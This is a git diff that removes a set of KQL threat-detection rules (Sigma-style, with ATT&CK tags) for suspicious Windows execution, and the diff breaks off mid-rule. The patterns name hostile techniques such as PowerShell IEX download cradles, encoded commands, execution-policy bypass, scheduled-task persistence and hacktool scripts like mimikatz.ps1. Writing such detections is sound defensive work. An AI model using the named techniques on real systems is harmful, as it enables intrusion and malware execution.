-| where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile("
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql b/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql
deleted file mode 100644
index 787c878f..00000000
--- a/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/05/24
-// Level: high
-// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql b/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql
deleted file mode 100644
index 54d656c3..00000000
--- a/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/24
-// Level: high
-// Description: Detects suspicious ways to run Invoke-Execution using IEX alias
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"")
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Parameter_Substring.kql b/Execution/Suspicious_PowerShell_Parameter_Substring.kql
deleted file mode 100644
index 9a895de4..00000000
--- a/Execution/Suspicious_PowerShell_Parameter_Substring.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects suspicious PowerShell invocation with a parameter substring
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv " or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " /NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Parent_Process.kql b/Execution/Suspicious_PowerShell_Parent_Process.kql
deleted file mode 100644
index 04761c14..00000000
--- a/Execution/Suspicious_PowerShell_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Harish Segar
-// Date: 2020/03/20
-// Level: high
-// Description: Detects a suspicious or uncommon parent processes of PowerShell
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql b/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql
deleted file mode 100644
index c2d28b62..00000000
--- a/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/12
-// Level: high
-// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ")
\ No newline at end of file
diff --git a/Execution/Suspicious_Program_Names.kql b/Execution/Suspicious_Program_Names.kql
deleted file mode 100644
index 793a6794..00000000
--- a/Execution/Suspicious_Program_Names.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/11
-// Level: high
-// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter"))
\ No newline at end of file
diff --git a/Execution/Suspicious_RASdial_Activity.kql b/Execution/Suspicious_RASdial_Activity.kql
deleted file mode 100644
index 4e30f528..00000000
--- a/Execution/Suspicious_RASdial_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious process related to rasdial.exe
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where FolderPath endswith "rasdial.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 62278102..00000000
--- a/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql b/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql
deleted file mode 100644
index 38edae09..00000000
--- a/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018/12/27
-// Level: high
-// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
-// Tags: attack.execution, attack.t1059, attack.t1202
-DeviceProcessEvents
-| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Runscripthelper.exe.kql b/Execution/Suspicious_Runscripthelper.exe.kql
deleted file mode 100644
index 568eff5f..00000000
--- a/Execution/Suspicious_Runscripthelper.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects execution of powershell scripts via Runscripthelper.exe
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Scan_Loop_Network.kql b/Execution/Suspicious_Scan_Loop_Network.kql
deleted file mode 100644
index 19d4fbec..00000000
--- a/Execution/Suspicious_Scan_Loop_Network.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/12
-// Level: medium
-// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
-// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
-DeviceProcessEvents
-| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql b/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
deleted file mode 100644
index 00359f36..00000000
--- a/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/11
-// Level: high
-// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql b/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql
deleted file mode 100644
index 6bdb9b98..00000000
--- a/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/31
-// Level: medium
-// Description: Detects creation of a scheduled task with a GUID like name
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {")
\ No newline at end of file
diff --git a/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql b/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
deleted file mode 100644
index 6ba5044f..00000000
--- a/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/16
-// Level: high
-// Description: Detects the creation of tasks from processes executed from suspicious locations
-// Tags: attack.persistence, attack.execution, attack.t1053
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql b/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql
deleted file mode 100644
index fe01afd0..00000000
--- a/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/15
-// Level: high
-// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql b/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql
deleted file mode 100644
index cd2233e3..00000000
--- a/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/21
-// Level: medium
-// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml \"C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\.CR." and ProcessCommandLine contains "Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\AppData\\Local\\Temp\\is-" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or ((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR") or InitiatingProcessCommandLine contains "unattended.ini"))))
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql b/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql
deleted file mode 100644
index 5bf43f5b..00000000
--- a/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/31
-// Level: medium
-// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_Schedule_Types.kql b/Execution/Suspicious_Schtasks_Schedule_Types.kql
deleted file mode 100644
index 93316841..00000000
--- a/Execution/Suspicious_Schtasks_Schedule_Types.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects scheduled task creations or modification on a suspicious schedule type
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql b/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql
deleted file mode 100644
index 3b3ce9ee..00000000
--- a/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
-// Date: 2021/07/14
-// Level: high
-// Description: Detects a suspicious script executions from temporary folder
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Spool_Service_Child_Process.kql b/Execution/Suspicious_Spool_Service_Child_Process.kql
deleted file mode 100644
index 9e6385cb..00000000
--- a/Execution/Suspicious_Spool_Service_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
-// Date: 2021/07/11
-// Level: high
-// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
-// Tags: attack.execution, attack.t1203, attack.privilege_escalation, attack.t1068
-DeviceProcessEvents
-| where (ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql b/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql
deleted file mode 100644
index 027c40e7..00000000
--- a/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael R. (@nahamike01)
-// Date: 2020/03/08
-// Level: high
-// Description: Detects the execution of CSharp interactive console by PowerShell
-// Tags: attack.execution, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql b/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql
deleted file mode 100644
index bf07a61d..00000000
--- a/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov, Cyb3rEng
-// Date: 2021/08/23
-// Level: high
-// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
-// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense_evasion
-DeviceProcessEvents
